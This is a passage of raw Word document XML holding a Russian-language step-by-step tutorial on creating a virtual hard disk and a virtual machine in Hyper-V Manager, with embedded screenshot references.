          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и попадаем на окно выбора типа жесткого диска. Здесь приведено краткое описания для каждого типа. Выбирайте тот, который вам более подходит. Скажу только, что если нет необходимости экономить пространство физического диска, лучше выбрать диск </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фиксированного размера</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> т. к. он дает наибольшую производительность. Кроме того, если сомневаетесь, можно прочитать подробную справку по этому вопросу нажав на </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительные сведения о виртуальных жестких дисках</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Выбрав нужный тип диска нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1939350" cy="1403102"/>
            <wp:effectExtent l="19050" t="0" r="3750" b="0"/>
            <wp:docPr id="111" name="Рисунок 25925" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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25" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image188.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="13110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1939291" cy="1403059"/>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На следующей странице указываем имя виртуального диска и его расположение. Если на физическом компьютере имеется RAID-массив или SSD-диск, то для увеличения быстродействия логично расположить виртуальный диск именно там. Указав все данные жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1976835" cy="1447021"/>
            <wp:effectExtent l="19050" t="0" r="4365" b="0"/>
            <wp:docPr id="108" name="Рисунок 25926" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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26" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image189.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="13898"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1976958" cy="1447111"/>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Далее, указываем размер жесткого диска, если необходимо создать новый пустой виртуальный жесткий диск, или полностью копируем в виртуальный диск один из имеющихся физических. В этом случае размер виртуального диска будет равен размеру диска, с которого будет происходить копирование. Такая функция необходима в том случае если нужно перенести физический компьютер в виртуальный. Выбираем нужные параметры и жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2045312" cy="1490400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="Рисунок 25927" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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27" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image190.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="13661"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2045371" cy="1490443"/>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Проверяем все настройки и нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Готово</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . В зависимости от параметров системы и выбранного объема, создание виртуального жесткого диска может занять довольно продолжительное время. Дождавшись конца установки в указанной папке появится только что созданный файл с расширением </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vhd</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Virtual Hard Disk). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2824950" cy="550315"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="Рисунок 25928" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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28" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image191.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2825668" cy="550455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание виртуальной машины</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь пришло время создать виртуальную машину. Для этого в Диспетчере Hyper-V в контекстном меню сервера виртуализации выбираем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виртуальная машина…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2220150" cy="1402917"/>
            <wp:effectExtent l="19050" t="0" r="8700" b="0"/>
            <wp:docPr id="89" name="Рисунок 26059" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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59" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image192.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2220320" cy="1403024"/>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Запустится </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер создания виртуальной машины</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , попадаем в окно, где нужно указать имя и, если необходимо, изменить физический путь хранения виртуальной машины (по умолчанию </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С:\ProgramData\Microsoft\Windows\Hyper-V\</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). Необходимо позаботиться, чтобы на жестком диске было достаточно свободного места, для последующего сохранения снимков. После указания всех данных жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2252314" cy="1634400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="Рисунок 26060" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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60" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image193.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="13287"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2257099" cy="1637872"/>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На следующей странице нужно указать объем оперативной памяти для виртуальной машины. Необходимо рассчитать этот параметр таким образом, чтобы имеющейся оперативной памяти хватило для всех виртуальных машин и для самого физического сервера. Жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2047350" cy="1479222"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="73" name="Рисунок 26061" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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61" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image194.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="12714"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2047164" cy="1479088"/>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На этом шаге надо определить, будет ли виртуальная машина подключена к виртуальной сети (созданной на шаге 2) выбрав соответствующий параметр и нажав </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2126550" cy="1542910"/>
            <wp:effectExtent l="19050" t="0" r="7050" b="0"/>
            <wp:docPr id="66" name="Рисунок 26062" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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62" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image195.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="13072"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2126328" cy="1542749"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь необходимо подключить в виртуальную машину виртуальный жесткий диск, созданный на предыдущем шаге, выбрав пункт </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использовать имеющийся виртуальный жесткий диск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и указав путь к нему. Или же можно создать новый виртуальный жесткий </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">диск выбрав </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать виртуальный жесткий диск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и заполнив все параметры (аналогично пункту 2 этой инструкции). Указав все данные жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2126765" cy="1540672"/>
            <wp:effectExtent l="19050" t="0" r="6835" b="0"/>
            <wp:docPr id="65" name="Рисунок 26063" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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63" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image196.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="12773"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2127164" cy="1540961"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверяем все настройки, нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Готово</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и дожидаемся сообщения об успешном создании виртуальной машины.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Редактирование параметров виртуальной машины</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если на предыдущем шаге все сделано правильно, то в диспетчере Hyper-V в окне </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виртуальные машины</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> появится только что созданная виртуальная машина. Для изменения параметров кликаем по ней правой кнопкой мыши и выбираем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контекстном меню. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2500950" cy="1578492"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="Рисунок 26130" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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30" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image197.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2500700" cy="1578334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
